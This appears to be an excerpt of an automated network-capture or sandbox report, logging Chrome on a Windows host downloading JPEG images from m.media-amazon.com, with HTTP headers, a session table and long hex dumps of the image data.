                                                                                                                                                                                          Expires: Sun, 27 Nov 2044 00:14:56 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 750696
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:59 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200141-IAD, cache-ewr-kewr1740074-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 cb 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 06 07 01 03 08 02 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 01 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec b0 84 84 d8 a7 c8 6b 80 a7 c0 b8 0a
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5k
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 6a f3 35 89 49 2b 42 bd 79 f4 f5 78 db ac 21 52 94 da a1 be c3 e7 19 64 39 43 ab f9 2e 1b 9d e0 36 c4 72 8d 70 94 7b 31 6e 6d 16 cd 6e 81 5f b5 1f f8 f5 ff 00 2e eb 32 23 7b 72 25 b9 e6 db d1 31 25 b6 44 aa 31 27 e6 f5 39 a6 77 0e b1 f7 f3 fc 44 66 b0 b5 20 6f 6d 06 fe 6d 86 a9 ad d7 26 e6 a4 39 db 7e 78 dc fe bf e9 db 2a 88 50 36 8d 66 ca 9f 1b 30 2f 9d 9a b6 86 33 ad 41 3f 61 b3 8c ca 9c 67 d9 9c 67 13 cd 33 ea 9d fa ad 3a e3 76 f5 57 31 87 d8 dc 9c 56 49 93 2b 4a 5b f4 43 e7 a7 4c d2 ad 5a e6 ad 9b 6b be c4 91 d5 1a 30 74 22 d2 e6 65 5a b3 4b e0 72 24 88 d5 9a 45 a8 ba 1c 97 79 0b 91 4e 94 1e 37 27 04 d2 18 ae 8b 69 6b 36 26 95 f3 8c f8 95 32 79 0f 78 00 fb 1b 9c 66 60 e3 1e ce e3 78 9e 5f f2 af 7a 59 bb c3 54 c1 6d ac 5e 9b 35 bd 33 34 f8 f5 55 fb 15
                                                                                                                                                                                          Data Ascii: j5I+Byx!Rd9C.6rp{1nmn_.2#{r%1%D1'9wDf omm&9~x*P6f0/3A?agg3:vW1VI+J[CLZk0t"eZKr$EyN7'ik6&2yxf`x_zYTm^534U
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 73 6a a7 80 b4 13 57 19 26 fc 69 a6 09 5b cb 6d 10 07 40 c7 6a 0c 85 ba b2 95 c0 5b ef 94 2e 03 a1 31 cf 84 c7 48 30 51 f9 22 f3 70 e7 ac 05 c1 1f 80 e5 6c b0 bc 57 f8 27 62 15 49 62 7e ab e7 19 e8 79 b3 90 3a ff 00 9d 96 da e5 5c 3c a3 a1 2c c4 50 09 5c 05 cc 86 aa 8b 54 4b ea a2 d5 02 aa 2d 50 2a ab 19 79 28 ec 9d 08 f5 15 4d ac 25 b5 51 6a 90 f5 51 6a 81 55 16 a8 15 4d f5 1b 1a a7 55 d1 c2 52 4b 1d f0 07 9c e4 89 6b ab ae 54 e4 f7 de 43 5f 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f ff c4 00 35 10 00 01 04 01 01 06 06 02 02 01 04 01 05 00 00 00 01 00 02 03 04 11 12 05 10 13 14 21 31 06 15 16 22 32 33 20 41 23 30 51 34 42 50 61 24 40 52 53 60 71 ff da 00 08 01 01 00 01 08 02 ff 00 87 b7 b4 e1 a6 40 93 d4 35
                                                                                                                                                                                          Data Ascii: sjW&i[m@j[.1H0Q"plW'bIb~y:\<,P\TK-P*y(M%QjQjUMURKkTC_?5!1"23 A#0Q4BPa$@RS`q@5
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: d1 38 b4 f1 43 7e 4d 9a 35 79 ed 95 b8 64 50 48 d4 e6 3c a8 a5 6b 5b 83 ce c4 a4 b4 c2 a3 3a b2 a5 e8 50 41 07 11 d4 5b 25 f5 a0 95 d5 23 92 68 c0 50 51 2e f7 1b 38 4e 18 40 65 1e 89 e7 db be 27 63 39 98 f7 43 7e db ff 00 51 12 94 b4 89 1a 88 dc d0 a1 0a 0c 90 4a 8e 67 7f b2 12 5d f2 bf 58 bc 6b 65 c2 5e ce 9a 4a a1 ad af 51 ea ff 00 72 9f f6 8b 82 7a 8a 4d 2a 47 64 a0 82 64 66 57 35 8d b3 10 95 ec 8c 43 53 84 dc 2b b6 43 32 d0 e3 a8 f5 7b 73 95 a3 09 95 f8 8a c7 7c 6e 0b 48 0d 05 cf 67 44 37 ed d3 89 e2 4f d2 d1 ee c6 e0 a2 97 42 d9 f3 b5 e3 4b a3 9b 4b f2 0d b8 da a0 bf c6 71 60 d2 ce a5 3b 84 b8 f0 b5 6d 0b 01 ce fe 3e 33 d5 28 f9 87 60 9d 9b 5d 9d dc ca b1 a9 66 88 67 49 39 41 35 6c 5d 0c 33 4c f3 b4 5b 26 b7 be 85 f3 34 44 99 3d e4 e5 dd d6 14 9d 96
                                                                                                                                                                                          Data Ascii: 8C~M5ydPH<k[:PA[%#hPQ.8N@e'c9C~QJg]Xke^JQrzM*GddfW5CS+C2{s|nHgD7OBKKq`;m>3(`]fgI9A5l]3L[&4D=
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: e0 9a ed 2b ba d9 d5 b9 a9 03 56 d6 0d 65 80 c6 6c 4a 66 c3 f5 2d a6 d8 8c 6c 64 82 a3 dc e7 35 cd 67 0f e3 70 83 a0 a3 84 d2 a4 61 76 71 22 8e 13 18 c9 21 1d d8 dc 7f a0 a1 bf c5 1f 6c 08 47 84 d7 1f 8b 58 38 45 4e 62 7a 63 84 80 b4 b8 63 74 79 ec b6 68 e5 a3 74 86 38 25 9a 61 aa 06 06 0d 2d 91 b1 3f e4 67 e1 e9 02 cc 10 c8 d2 1b 26 c6 98 f6 7d 77 b3 b8 fd 2a ff 00 ee 52 80 c7 e5 39 cb 3b 8e e2 77 3b f2 c6 e1 bf c5 1f 6c 2a 37 65 67 87 d8 bf 56 5a 2a d0 6c d2 46 d1 e5 cc 1d b9 06 ae 4c 2e 54 26 c3 9e fc 00 b8 0d 5c b3 17 09 a8 30 0d db 6e be 58 64 03 f4 b5 16 e5 12 02 7b 87 e0 5d 95 8f cd a3 71 43 7f 8a be d8 13 1d 85 c4 cf 54 ec 34 65 6c af bd af 71 70 41 e1 6b 09 f2 b5 34 ac ad 4b 5a 32 2b 3b 4c 41 f2 3e 22 0a 6d b7 24 f1 bd aa bc 12 4f 81 1d ca d3 d3
                                                                                                                                                                                          Data Ascii: +VelJf-ld5gpavq"!lGX8ENbzcctyht8%a-?g&}w*R9;w;l*7egVZ*lFL.T&\0nXd{]qCT4elqpAk4KZ2+;LA>"m$O
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: c0 f7 4f 55 91 c3 5e 40 da ac 35 df 32 a7 56 19 19 3b e5 6d 4a d3 b6 5e 0d 0a b1 ce e7 f1 03 68 ad 21 61 5d 89 f1 c8 44 36 e4 32 b8 31 49 52 ad 63 a2 6b 74 db 0e 87 33 95 ab 1c 50 be 4b 74 e3 64 71 4d 13 36 7b 24 aa 66 1b 3f 66 b2 c3 24 7b da cd 58 02 f6 cd 8e 06 6a 8f 67 54 65 a9 9b 1b b0 16 cf a8 cb 53 36 37 57 6c 24 9e 2c 94 e9 c6 c8 a4 35 ab c1 34 ae 8d 43 40 01 2b ec 29 3e 25 0d fe 26 fb 61 dd 05 a6 53 ad ed ab b4 59 60 49 04 dd 93 08 d4 d5 b5 6f 17 58 79 89 d2 17 9c b8 70 ed 41 03 14 ce 64 15 f8 03 67 d9 e0 45 68 b7 9e 75 ba d2 32 4d 91 28 8d f2 95 2f 16 76 e8 79 e9 bb 6b db cd 83 c3 6c c4 3c 48 ac 41 15 b7 99 a3 bb 3c 7a 22 82 29 36 8b e0 82 a8 87 6a 4e 2c f0 a6 51 5b e5 e0 ae e6 c3 6e 13 33 9a cd 98 e6 46 e3 33 eb 5f 86 62 f8 9f b2 5c d8 6d 0d 63
                                                                                                                                                                                          Data Ascii: OU^@52V;mJ^h!a]D621IRckt3PKtdqM6{$f?f${XjgTeS67Wl$,54C@+)>%&aSY`IoXypAdgEhu2M(/vykl<HA<z")6jN,Q[n3F3_b\mc
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 15 7e 23 d4 43 15 43 16 54 1e 5b c7 30 c0 82 d0 ec 14 45 c1 6c f4 b7 fd 6d 33 f5 37 4b eb 01 77 44 66 4c 95 b0 35 84 2c aa 84 b7 70 35 56 82 b0 05 d4 be ec a2 56 73 f2 8c a4 82 06 ce 30 48 42 41 80 1c 83 2b 38 e8 a4 03 83 2d f4 68 22 5a c7 24 db f3 8d 46 3c 80 ea e7 73 ad 37 7d 8b 6f ff 00 19 a8 aa e4 2a a5 75 90 b8 63 d2 d4 04 79 ae a3 9d c6 0c 96 c0 8c b9 61 d1 86 54 c0 25 ba 4d df 25 e2 f1 1a 92 66 f1 59 05 ff 00 9d a3 38 09 ab 5b f2 14 d3 5e 41 8a f9 3e 0b 08 6c 13 62 db e2 70 ae 66 c3 bf 10 28 1d 3f b1 d0 fd 40 d3 ec 43 70 56 da ff 00 64 00 d4 8c 90 da 8a 95 50 15 17 94 28 55 ac c1 11 2f cd 9b 63 8f 8c 6d b2 af 88 31 7e 89 80 79 3d 71 d1 be 8c 0f fd 11 1e a5 b1 76 b0 47 a1 4b 4c 97 52 d1 ab 0c 8c b0 ff 00 d2 5c e7 91 00 ab fd d0 ae e5 86 af 97 4c 1c
                                                                                                                                                                                          Data Ascii: ~#CCT[0Elm37KwDfL5,p5VVs0HBA+8-h"Z$F<s7}o*ucyaT%M%fY8[^A>lbpf(?@CpVdP(U/cm1~y=qvGKLR\L
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 3b 8c 6d 3b 55 5b 31 11 f2 14 0e 15 36 2c 53 0a e7 26 6d 9a 5d d6 36 c9 76 92 bb 76 ef 6a 05 4a 2c 0d a8 64 00 a5 d6 d8 6c 24 d3 62 95 fc dd c6 3f 18 84 02 0b 1b 56 dd a2 59 82 a3 07 1b 48 97 a6 e0 38 3a 92 03 09 48 cd aa 21 3e f3 76 92 b5 da 05 0b ca 9c c0 e3 04 d0 d4 a1 40 d7 50 25 5a 6f ec 17 2b b6 0b 3d 96 5a ac d9 50 78 69 ed 65 c8 5b 2e f0 10 18 ec aa 99 6f 71 1c aa 91 c1 0e 18 18 5a 69 fe 53 60 15 d9 d4 0d c4 c4 d4 28 f6 c3 99 5b ec ec 37 91 e5 f4 2f a7 da cc 2c b4 82 03 d3 b4 0d c1 4c 5a 4e 3c f3 5e 81 91 d6 38 19 83 50 bc bc b3 d8 58 e4 81 e6 7f 9c 17 f6 10 a4 0d b4 e6 2d 25 d7 7d 7f aa 16 6a ee 2c bb 97 4e ec d6 10 c7 4c 1c 38 65 ab 20 c7 d3 e2 ad d1 3f 78 a5 cc bc 16 22 63 f3 02 33 7e 03 8e 70 38 21 1b c6 5e ac 8d ca 4c ae f7 a9 b7 28 e5 6a 5f
                                                                                                                                                                                          Data Ascii: ;m;U[16,S&m]6vvjJ,dl$b?VYH8:H!>v@P%Zo+=ZPxie[.oqZiS`([7/,LZN<^8PX-%}j,NL8e ?x"c3~p8!^L(j_
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 34 d2 fa 5c 9a 69 b9 31 d5 fa a6 a9 a6 75 45 7c 13 1d c2 50 22 77 26 99 d5 15 f0 4d 26 30 8b 96 4d dc 25 34 d2 fa 5d da b2 6e e1 29 8e a7 d5 28 11 1a c4 5e 9a 40 38 c4 04 74 c7 57 d3 c7 d7 93 b2 e5 b0 df 33 a4 ba 5f 18 4c 5f b9 74 6d 64 6d 46 bf 98 95 3f 10 fc 48 3b dc ea f8 85 d2 f8 19 28 d7 15 b4 81 9b 19 20 dd 71 26 15 7e 06 54 34 c6 f8 9f b4 ba 20 b6 bd d8 21 65 e3 2a c0 f6 f5 5d 02 85 bd c8 10 df a5 e2 93 27 b1 03 0e c9 5d 8c 7e b8 21 5b 6c a6 3f 0f a8 af 6e 40 fa 7a ac 5d 96 ae f2 ba 7f 1b 29 67 5f 44 cf 9a fe 69 71 23 53 a0 02 ba 3f 02 9a ac e2 af fd 9d e2 7f ba ff 00 b4 a8 f6 65 1a d7 0d 71 94 16 4a e9 1c ae 49 af 1b d8 eb fb c2 69 76 4c 7c 4f 89 db 51 a3 fd be 49 d6 87 d1 d9 38 c6 12 a6 03 32 d3 ff 00 6b 55 5f d0 f0 85 d2 0e 7b 3c 34 be ef aa fe
                                                                                                                                                                                          Data Ascii: 4\i1uE|P"w&M&0M%4]n)(^@8tW3_L_tmdmF?H;( q&~T4 !e*]']~![l?n@z])g_Diq#S?eqJIivL|OQI82kU_{<4
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 44 a3 e2 84 72 45 e8 7f 03 b2 ec e7 c1 1a ee e4 e2 81 d2 75 4a b8 6a 40 1e d1 28 53 76 09 95 c0 dc a1 0e 40 fe 0b 65 d9 af 5d e7 30 1e 0a 3c 14 78 2f 44 73 84 33 e1 7e 6a 7f 09 b2 ec fd eb fd 66 28 a3 c9 12 98 e4 c4 c8 04 5e bc 4d 02 65 35 82 8f 77 3a 33 5f 1c 8d 97 67 aa 32 7d 15 d9 89 e5 ea 41 09 fa ba e1 08 b2 2e 58 60 bb d1 f1 32 0a 10 47 32 60 f6 ab d1 e5 6c 95 8e 7c 73 e0 9a 98 98 98 9a 8c 27 49 58 66 eb 04 e8 8b cd e8 e9 6b 2b 1c 17 54 5f 88 e5 98 45 5e bf de 63 c9 13 f4 4e f5 09 83 35 c5 1b b3 8e 59 a7 6a 35 39 84 99 11 b9 18 5e 4b a4 d3 45 8a 3c c9 e5 ff 00 49 de a1 1e 73 57 23 08 cd 4c c1 0a 15 3e 28 94 4a 71 4f 29 e9 d3 cc 89 d0 77 a8 4c 1e 2a 14 66 85 0a 14 26 03 de 9a 07 7a 68 3d eb 22 38 bf 45 92 1c 5f a2 60 13 84 a6 0f 15 92 1c 45 30 01 da
                                                                                                                                                                                          Data Ascii: DrEuJj@(Sv@e]0<x/Ds3~jf(^Me5w:3_g2}A.X`2G2`l|s'IXfk+T_E^cN5Yj59^KE<IsW#L>(JqO)wL*f&zh="8E_`E0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          43192.168.2.1649759151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:58 UTC445OUTGET /images/M/MV5BYTk4YjhmNGMtOTZkYi00MjNmLThmZGItMGYyNDljNTdhNDA1XkEyXkFqcGdeQXVyNDE5MTU2MDE@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:59 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 45655
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 4e1a6eb2-e744-490b-b5b6-47b77b99e9ee
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Fri, 21 Oct 2016 11:18:36 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sun, 25 Sep 2044 01:02:31 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:59 GMT
                                                                                                                                                                                          Age: 2823606
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000107-IAD, cache-nyc-kteb1890097-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 99 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 02 03 01 01 01 01 01 00 00 00 00 00 00 00 00 06 07 04 05 08 03 02 01 09 00 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 60 d6 fc e6 b7 ad af 8b 16 77 1f fb 80
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5`w
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: ce 35 02 f1 f4 99 d6 cc 2c ae 55 38 56 cb 5c ed 6a af fe 8e d5 6a 05 97 f7 73 e8 bf 30 95 94 6d db 04 7f cb 8c f8 5e 1c d9 57 a7 9f 5c b8 6e 66 e2 91 b5 87 b5 85 eb ed 68 f5 db 9d 1e 30 f5 c4 54 f5 ce 7a 0d 1d e6 99 a5 49 26 61 ee 67 40 e2 ce 5c c1 91 f0 f9 3d eb ab 1e ea 2a dc 21 1b a2 b2 81 28 23 5f df 77 6a 62 65 92 23 56 9d 3b 18 3f d8 0b d6 97 1f 59 e9 ca e8 ec a2 2b fa 8f 83 3b 97 10 b7 74 ee ec 38 4b b1 44 8e 2c cd e3 75 a8 2d 4c e2 46 79 a5 47 5c 3e 7c 39 fa 06 95 f3 d1 11 78 9e 3b f8 3a 5d cd 6e c1 81 ff 00 a1 7d 3a b7 65 62 c4 2b 6b 6a 46 4e 50 7d e4 6a 32 24 55 5a 5f 3a b0 59 89 06 09 96 1b 20 85 81 d6 77 7e 71 fe 85 63 0d 5f 32 19 bf 7f 36 e3 38 a7 e8 77 cc 5f 02 b3 b5 88 b3 3a a2 2b a4 39 e5 59 87 5f f4 03 39 e7 9e dd 6d 42 57 8d 63 4f 6f 69
                                                                                                                                                                                          Data Ascii: 5,U8V\jjs0m^W\nfh0TzI&ag@\=*!(#_wjbe#V;?Y+;t8KD,u-LFyG\>|9x;:]n}:eb+kjFNP}j2$UZ_:Y w~qc_268w_:+9Y_9mBWcOoi
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: f0 2a 4f fc ad 96 56 f7 9e 2b 7a a2 7e 72 81 7a 98 97 e5 0c 8c 56 79 e4 a3 0a 8c 79 87 0d 8a 2d 89 17 74 42 23 82 f3 3f 11 de 9a 52 a5 44 6a 51 b0 6e 43 6b a2 cc 79 ea cf 33 cd 8f e5 05 b9 39 93 cd 4e 0d d6 78 a3 7e 10 04 fd 48 04 b8 45 8e 3e 0a 72 ea 33 7c ac 26 1c 2c 8e c0 45 c4 18 8a 69 f7 9e f1 fd 1b 65 28 60 0e 0d 36 b2 81 9c b6 05 19 21 36 b4 37 31 15 d8 5b 70 eb a9 2e 64 36 a7 92 56 35 5d 21 c9 2b ed 5d 96 2f 9d 7f 12 6f f5 3a 3d e1 05 37 31 51 78 39 73 0d 45 89 6b 5d 12 6a 02 7c bc ba e4 97 95 c2 77 eb 9b 1b 95 8c 5c c4 e3 9d 6c a0 9a 63 04 35 c5 a4 3f 1c 88 04 ca f8 d6 99 23 68 1f 3a 97 39 6b 7e e5 cc 57 21 36 67 c9 9c 9a c6 76 44 5a 72 14 ed 51 19 47 10 3c 74 64 c2 03 22 b1 9e 1f 4b d9 0c 97 42 56 54 89 d0 2d 1d 71 3d 9e ab 74 df 6b 76 69 21 d1
                                                                                                                                                                                          Data Ascii: *OV+z~rzVyy-tB#?RDjQnCky39Nx~HE>r3|&,Eie(`6!671[p.d6V5]!+]/o:=71Qx9sEk]j|w\lc5?#h:9k~W!6gvDZrQG<td"KBVT-q=tkvi!
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 26 c4 7e 3a a9 51 b2 34 89 e4 0c 82 bf d3 c7 1a 1e 2b ee 95 e7 87 bb dc f3 56 54 25 73 4d bf 1d 65 ea 96 db fd 86 23 36 db 6c 43 e5 f1 7c 91 b5 b5 e5 14 80 7d 11 82 ad 82 d5 e6 ef 8d 5f 25 a3 6e 69 7a e4 d5 69 2d 46 40 91 9f 55 23 07 9c ff 00 eb 02 93 f0 32 b4 bc 77 07 98 0c 06 29 07 e0 67 fd 67 81 b6 f1 b9 91 bc c7 ec 40 72 dd d1 1e d9 5e 0e 1f 7a c4 53 19 8f 32 64 50 39 36 a1 a9 19 3d a9 05 17 e0 cf 9a 75 5e c9 3d f3 c9 c8 f1 cd 4f 50 ee da 38 f4 dd 50 c5 ed 6b 10 a3 20 22 df 15 6e 26 3b 32 41 bc 78 8d cb e3 fd 63 c8 4f b9 f2 1b 6d 5f 72 90 ea f3 16 d8 cf a8 bc a8 c9 82 d4 95 c9 31 9d 72 ce db 63 39 72 4b 27 cf a5 78 4c ee a8 26 92 3a 31 72 cd 4d 11 9a 3d a4 29 46 26 64 b3 18 f6 ce 9a 93 6d 04 b9 cb 03 ef e7 29 bf f8 c8 db 88 c4 1c 41 63 5d 4c 8d e4 7d
                                                                                                                                                                                          Data Ascii: &~:Q4+VT%sMe#6lC|}_%nizi-F@U#2w)gg@r^zS2dP96=u^=OP8Pk "n&;2AxcOm_r1rc9rK'xL&:1rM=)F&dm)Ac]L}
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: b9 d1 28 08 d0 4c d6 35 fe 2d b4 71 95 7d a5 57 b5 33 ce 12 2d 5f ac c2 ca f5 5f b2 28 98 e9 27 9d b9 1f 35 ff 00 e3 88 66 93 2b 4d 06 ee 2c 0e fe 81 ac c9 1b f5 ed e9 a5 ff 00 bf a4 be 06 f9 1e fb 78 bb b2 70 80 4d 26 fb 01 bf 54 63 28 f8 23 23 38 b9 b6 6d 8d 88 7c e2 79 c2 b8 71 b3 54 6e 76 18 65 bf 67 31 95 e2 21 24 9b 26 97 82 c7 9a 2b 85 b0 33 5d 85 a5 80 71 87 4d 92 78 5e 65 d3 a5 12 57 81 84 da 45 91 2b 6d 5e 2e 98 d2 3c d5 6f 59 8d cc 4b 73 47 92 0d e4 1a 7f f0 41 9a 45 49 21 95 f9 fe a0 f8 87 34 4f 15 c6 6a ad ff 00 26 5c 1e ba 60 fc 8e 2f 9c 97 dd c4 65 70 12 5d cf 32 4f 2c 89 7c e4 ad cd f2 a7 83 91 1c 43 eb c3 91 dc cf 34 70 fc c3 6b 97 e1 15 93 2c 8d 87 1d f6 c8 49 96 5e cc b0 77 63 97 3e c5 68 a0 cb bb f3 18 4e de 45 7d 7a 63 f3 3f ea 29 3c
                                                                                                                                                                                          Data Ascii: (L5-q}W3-__('5f+M,xpM&Tc(##8m|yqTnveg1!$&+3]qMx^eWE+m^.<oYKsGAEI!4Oj&\`/ep]2O,|C4pk,I^wc>hNE}zc?)<
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 0e 75 fd 7c 9c 32 4d 86 c0 4b 28 4f 95 38 0e 6a 90 7d 45 69 17 2b 27 b0 b1 39 b6 6d 8a 30 2e 57 5d b7 de b7 88 65 38 b6 c7 9c bd 33 c9 c4 ac ba 6a dd 99 50 7d 1c 54 fc e4 74 9b 52 6e 72 09 21 ab f6 90 5d 9c 6d b5 49 c4 a9 22 e7 59 ca b3 f5 37 94 ff 00 95 1b 43 e9 bf 8d b2 7f 7c 50 3e 27 c8 c8 4f 1d f2 bf 81 8d 93 36 4a 76 3b 8a 1a bb 6f c2 69 bf 13 94 8f da 19 7e c7 4c 7b e5 45 e8 8d 53 2d db 15 c6 e4 72 90 f6 34 49 83 14 f9 19 24 3d 45 a3 c2 b9 1c 6c ff 00 10 52 ec 3b 65 f8 04 24 2a c3 19 91 80 5f a7 10 27 27 92 66 b3 ec 10 d3 bb c4 ae 22 ea 30 2f 11 64 da b0 dc 9a 0d 59 d6 31 dd 3e a1 0c 9c b2 cc cb 27 1e 3c d9 f3 f4 e0 fe 7f 55 62 a4 11 2b 0b 0d cb 2b e8 cc de 64 9f 4b da 12 15 17 ce 31 ca e7 61 8e d9 23 61 1c ce d8 ca f1 8d ce 9f 7d f8 b4 2d fc 68 13
                                                                                                                                                                                          Data Ascii: u|2MK(O8j}Ei+'9m0.W]e83jP}TtRnr!]mI"Y7C|P>'O6Jv;oi~L{ES-r4I$=ElR;e$*_''f"0/dY1>'<Ub++dK1a#a}-h
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: d2 37 11 e4 9a 42 88 d9 b2 7d 19 21 7e bc 9f 43 db 71 13 e8 c9 cd 15 0e 9a 12 37 7c fd bc a4 a9 16 55 8f b0 44 c1 08 90 12 91 82 de 72 29 bd ef 1f ae a3 c0 84 0d d9 be 37 9c 00 2f 81 d9 86 6f fc 42 79 cd c7 2f 11 0d b2 21 9f 19 2c bb fb 42 27 01 96 26 ff 00 18 46 2e 3c c2 3b a6 43 3d 6d 84 ee d6 6b b5 a1 76 34 8b a8 c2 2b 1d 03 8a 77 2b c0 05 b1 52 7c ab 64 7d ad f4 f9 53 eb a6 53 aa dc 13 55 3b 5b ed 32 a9 cb af bd 6b 79 7e 67 69 14 ad bb 11 49 bf 13 22 76 43 d8 66 ef e1 ce 3b d0 4a f0 4b 90 95 81 2b 40 63 95 76 38 92 2a 0f 21 81 69 36 5f 4d 6b 75 30 b8 86 c6 f9 be 58 db 6d 8c 71 72 f2 58 71 f2 67 b9 f2 16 21 c3 64 c4 c8 3f 21 92 c9 fe 02 47 c0 64 ef c7 c6 13 9c b3 96 5c fe 59 b2 3d 1d a1 10 8c 87 45 66 0a a6 ed 68 e0 e3 c2 4d 0c d7 66 df f6 26 e7 36 1d
                                                                                                                                                                                          Data Ascii: 7B}!~Cq7|UDr)7/oBy/!,B'&F.<;C=mkv4+w+R|d}SSU;[2ky~giI"vCf;JK+@cv8*!i6_Mku0XmqrXqg!d?!Gd\Y=EfhMf&6
